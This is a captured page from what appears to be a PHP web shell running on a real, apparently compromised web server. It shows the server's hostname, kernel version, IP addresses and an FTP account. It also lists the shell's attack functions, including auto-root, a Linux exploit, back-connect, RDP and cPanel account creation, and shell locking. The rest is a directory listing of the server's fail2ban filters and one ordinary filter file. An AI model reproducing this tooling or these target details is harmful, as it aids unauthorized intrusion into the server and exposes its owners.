Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
fail2ban /
filter.d /
[ HOME SHELL ]
Name
Size
Permission
Action
ignorecommands
[ DIR ]
drwxr-xr-x
3proxy.conf
467
B
-rw-r--r--
apache-auth.conf
3.15
KB
-rw-r--r--
apache-badbots.conf
2.76
KB
-rw-r--r--
apache-botsearch.conf
1.24
KB
-rw-r--r--
apache-common.conf
1.58
KB
-rw-r--r--
apache-fakegooglebot.conf
324
B
-rw-r--r--
apache-modsecurity.conf
511
B
-rw-r--r--
apache-nohome.conf
596
B
-rw-r--r--
apache-noscript.conf
1.22
KB
-rw-r--r--
apache-overflows.conf
2.13
KB
-rw-r--r--
apache-pass.conf
362
B
-rw-r--r--
apache-shellshock.conf
1020
B
-rw-r--r--
assp.conf
3.41
KB
-rw-r--r--
asterisk.conf
2.31
KB
-rw-r--r--
bitwarden.conf
427
B
-rw-r--r--
botsearch-common.conf
522
B
-rw-r--r--
centreon.conf
307
B
-rw-r--r--
common.conf
2.71
KB
-rw-r--r--
counter-strike.conf
244
B
-rw-r--r--
courier-auth.conf
429
B
-rw-r--r--
courier-smtp.conf
512
B
-rw-r--r--
cyrus-imap.conf
444
B
-rw-r--r--
directadmin.conf
338
B
-rw-r--r--
domino-smtp.conf
2.06
KB
-rw-r--r--
dovecot.conf
2.4
KB
-rw-r--r--
dropbear.conf
1.69
KB
-rw-r--r--
drupal-auth.conf
557
B
-rw-r--r--
ejabberd-auth.conf
1.54
KB
-rw-r--r--
exim-common.conf
516
B
-rw-r--r--
exim-spam.conf
2.11
KB
-rw-r--r--
exim.conf
2.81
KB
-rw-r--r--
freeswitch.conf
1.88
KB
-rw-r--r--
froxlor-auth.conf
1.18
KB
-rw-r--r--
gitlab.conf
236
B
-rw-r--r--
grafana.conf
388
B
-rw-r--r--
groupoffice.conf
236
B
-rw-r--r--
gssftpd.conf
322
B
-rw-r--r--
guacamole.conf
1.41
KB
-rw-r--r--
haproxy-http-auth.conf
1.14
KB
-rw-r--r--
horde.conf
404
B
-rw-r--r--
kerio.conf
938
B
-rw-r--r--
lighttpd-auth.conf
333
B
-rw-r--r--
mongodb-auth.conf
2.23
KB
-rw-r--r--
monit.conf
787
B
-rw-r--r--
murmur.conf
927
B
-rw-r--r--
mysqld-auth.conf
953
B
-rw-r--r--
nagios.conf
400
B
-rw-r--r--
named-refused.conf
1.46
KB
-rw-r--r--
nginx-botsearch.conf
681
B
-rw-r--r--
nginx-http-auth.conf
485
B
-rw-r--r--
nginx-limit-req.conf
1.42
KB
-rw-r--r--
nsd.conf
760
B
-rw-r--r--
openhab.conf
452
B
-rw-r--r--
openwebmail.conf
495
B
-rw-r--r--
oracleims.conf
1.89
KB
-rw-r--r--
pam-generic.conf
947
B
-rw-r--r--
perdition.conf
568
B
-rw-r--r--
php-url-fopen.conf
891
B
-rw-r--r--
phpmyadmin-syslog.conf
278
B
-rw-r--r--
portsentry.conf
242
B
-rw-r--r--
postfix.conf
3.09
KB
-rw-r--r--
proftpd.conf
1.14
KB
-rw-r--r--
pure-ftpd.conf
2.35
KB
-rw-r--r--
qmail.conf
795
B
-rw-r--r--
recidive.conf
1.34
KB
-rw-r--r--
roundcube-auth.conf
1.46
KB
-rw-r--r--
screensharingd.conf
821
B
-rw-r--r--
selinux-common.conf
538
B
-rw-r--r--
selinux-ssh.conf
570
B
-rw-r--r--
sendmail-auth.conf
776
B
-rw-r--r--
sendmail-reject.conf
2.88
KB
-rw-r--r--
sieve.conf
371
B
-rw-r--r--
slapd.conf
706
B
-rw-r--r--
softethervpn.conf
451
B
-rw-r--r--
sogo-auth.conf
722
B
-rw-r--r--
solid-pop3d.conf
1.07
KB
-rw-r--r--
squid.conf
260
B
-rw-r--r--
squirrelmail.conf
191
B
-rw-r--r--
sshd.conf
7.34
KB
-rw-r--r--
stunnel.conf
363
B
-rw-r--r--
suhosin.conf
649
B
-rw-r--r--
tine20.conf
890
B
-rw-r--r--
traefik-auth.conf
2.33
KB
-rw-r--r--
uwimap-auth.conf
374
B
-rw-r--r--
vsftpd.conf
637
B
-rw-r--r--
webmin-auth.conf
444
B
-rw-r--r--
wuftpd.conf
520
B
-rw-r--r--
xinetd-fail.conf
521
B
-rw-r--r--
znc-adminlog.conf
912
B
-rw-r--r--
zoneminder.conf
524
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : traefik-auth.conf
# Fail2ban filter configuration for traefik :: auth # used to ban hosts, that were failed through traefik # # Author: CrazyMax # # To use 'traefik-auth' filter you have to configure your Traefik instance to write # the access logs as describe in https://docs.traefik.io/configuration/logs/#access-logs # into a log file on host and specifiy users for Basic Authentication # https://docs.traefik.io/configuration/entrypoints/#basic-authentication # # Example: # # version: "3.2" # # services: # traefik: # image: traefik:latest # command: # - "--loglevel=INFO" # - "--accesslog=true" # - "--accessLog.filePath=/var/log/access.log" # # - "--accessLog.filters.statusCodes=400-499" # - "--defaultentrypoints=http,https" # - "--entryPoints=Name:http Address::80" # - "--entryPoints=Name:https Address::443 TLS" # - "--docker.domain=example.com" # - "--docker.watch=true" # - "--docker.exposedbydefault=false" # - "--api=true" # - "--api.dashboard=true" # ports: # - target: 80 # published: 80 # protocol: tcp # mode: host # - target: 443 # published: 443 # protocol: tcp # mode: host # labels: # - "traefik.enable=true" # - "traefik.port=8080" # - "traefik.backend=traefik" # - "traefik.frontend.rule=Host:traefik.example.com" # - "traefik.frontend.auth.basic.users=test:$$apr1$$H6uskkkW$$IgXLP6ewTrSuBkTrqE8wj/" # volumes: # - "/var/log/traefik:/var/log" # - "/var/run/docker.sock:/var/run/docker.sock" # restart: always # [Definition] # Parameter "method" can be used to specifiy request method req-method = \S+ # Usage example (for jail.local): # filter = traefik-auth[req-method="GET|POST|HEAD"] failregex = ^<HOST> \- <usrre-<mode>> \[\] \"(?:<req-method>) [^\"]+\" 401\b ignoreregex = # Parameter "mode": normal (default), ddos or aggressive # Usage example (for jail.local): # [traefik-auth] # mode = aggressive # # or another jail (rewrite filter parameters of jail): # [traefik-auth-ddos] # filter = traefik-auth[mode=ddos] # mode = normal # part of failregex matches user name (must be available in normal mode, must be empty in ddos mode, and both for aggressive mode): usrre-normal = (?!- )<F-USER>\S+</F-USER> usrre-ddos = - usrre-aggressive = <F-USER>\S+</F-USER>
Close